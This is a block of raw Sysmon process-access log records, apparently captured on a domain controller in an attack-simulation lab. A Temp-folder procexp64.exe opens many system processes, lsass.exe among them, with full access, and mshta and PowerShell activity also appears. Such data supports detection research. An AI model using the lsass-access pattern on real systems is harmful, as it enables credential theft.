15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786710Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786709Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786708Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786707Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786706Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786705Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786704Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786703Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786702Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786701Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786700Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786699Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786698Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786697Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786696Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786695Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786694Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786693Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786692Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786691Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786690Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.518{732C744F-151A-600B-1600-00000000A301}15285192C:\Windows\system32\svchost.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786689Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.518{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786688Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.471{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786687Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.471{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000786686Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.408{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ttigh3bg.ecs.ps12021-01-26 15:16:05.408 10341000x8000000000000000786685Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.393{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786684Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786683Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786682Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786681Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786680Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786679Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786678Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 